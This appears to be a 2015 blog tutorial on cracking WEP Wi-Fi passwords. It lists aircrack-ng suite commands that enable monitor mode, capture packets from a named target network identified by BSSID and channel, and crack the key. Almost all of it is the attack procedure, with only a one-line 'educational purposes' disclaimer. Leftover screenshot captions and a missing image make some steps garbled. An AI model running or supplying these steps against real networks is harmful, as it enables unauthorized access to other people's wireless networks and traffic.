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Thursday, 24 September 2015

Wifi Hack: Crack WEP Passwords

  1. Open up a Terminal window.
  2. Enter: airmon-ng
  3. Note down the interface on which you want to start the monitoring. In my case it is wlan0 so I will be using wlan0Kali Tutorials - WEP Crack Hack
  4. Enter: airmon-ng start wlan0 If the result looks like this: then your card is in monitor mode. Kali Tutorials - WEP Crack Hack
  5. Note down the monitoring interface’s name (“monitor mode enabled on mon0“). In my case it is mon0 so I will be using mon0.
  6. Enter: airodump-ng mon0 Kali Tutorials - WEP Crack Hack
  7. My target is “mtnl” which is using WEP encryption and authentication. Wifi “mtnl” is working on channel 4 and BSSID (or bssid) is 0C:D2:B5:03:43:68. I will be using this information. Enter: airodump-ng –w mtnl-org –c 4 –bssid 0C:D2:B5:03:43:68 mon0 Kali Tutorials - WEP Crack Hack
  8. After about 15,000 packets have been captured, enter: aircrack-ng mtnl-org-01.cap to start cracking the WEP password. Kali Tutorials - WEP Crack Hack

                                    This tutorial is for Educational Purposes Only

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